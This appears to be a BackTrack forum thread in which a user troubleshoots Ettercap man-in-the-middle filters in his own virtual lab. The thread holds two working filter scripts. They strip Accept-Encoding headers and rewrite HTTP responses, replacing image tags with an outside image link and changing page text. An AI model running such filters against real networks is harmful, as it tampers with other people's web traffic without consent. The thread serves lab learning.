Results 1 to 3 of 3

Thread: Ettercap Filter issue with Replace

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Default Ettercap Filter issue with Replace

    Hi,

    I have been pouring over the Internet and especially this forum the last few days to try to find an answer to my problem.
    I see in the past many people have had issues with getting Ettercap Filters to work, and I guess I am now one of them

    I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter

    I'm running two VM's:

    1. BT5 R3 Gnome 64 Bit (thought I have tried this now on BT4 R2, BT5, R2)
    2. Windows XP SP2

    The filter from the website is this one below:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }

    With this one, no images are replaced however sometimes at the bottom of the page a line that might have a javascript src tag will be changed to the image link.
    Wireshark shows that the TCP packets are coming in out of Order and calling for Retransmission. I can see inside that they are getting changed but - then it looks like a re-transmission occurs and they are getting replaced maybe?
    I switched the script up some, and replaced it with one I found on this website to just change the Title Tag:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
      msg("in Second IF\n");
       if (search(DECODED.data, "Hello")){
          replace("Hello", "12345"); 
          msg("run\n");
       }
    
       if (search(DATA.data, "Google")){
          replace("Google", "GOOGLE HACKED"); 
          msg("run2\n");
       }
    }
    This one is even more interesting, as if a page has those keywords in it, I'll get a page cannot be displayed. On both I'm getting the msg's that the script is getting triggered.. /sigh
    Any idea's?

    I've uncommented the lines in etter.conf for the iptables.. I'm also only running ettercap with this, not sslstrip etc..

    Thanks for any help you can provide

    -DV

  2. #2
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Smile Re: Ettercap Filter issue with Replace

    Just a quick follow up:

    I figured out one problem, I was editing a different etter.conf file, it appears on BT5 R3 there are 2?
    One in /etc/ and one in /usr/local/etc the second one being the one that the ettercap utility was using on my VM.

    However, I am still running into the same issues, the web page will just remain unaltered and I keep seeing the TCP Out of Order messages.

    Once again, thanks for any help in advance

  3. #3
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Default Re: Ettercap Filter issue with Replace

    I think I have isolated the problem, it appears that if I'm using VM's from VirtualBox the tests will fail.
    However, if I use two separate computers or if I use VMWare it seems to work. Weird!

Similar Threads

  1. Ettercap und Filter
    By hardez in forum Anfänger Ecke
    Replies: 3
    Last Post: 11-03-2009, 01:26 PM
  2. ettercap filter - replace every img in victim brower
    By imported_onryo in forum OLD Programming
    Replies: 5
    Last Post: 05-20-2009, 11:51 PM
  3. Help with ettercap filter
    By Tully in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-25-2009, 09:46 AM
  4. Re: Funny Ettercap Filter
    By Slimmay in forum OLD Newbie Area
    Replies: 3
    Last Post: 11-10-2008, 10:12 AM
  5. ettercap filter
    By Tex-Twil in forum OLD BackTrack v2.0 Final
    Replies: 28
    Last Post: 10-07-2007, 05:31 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •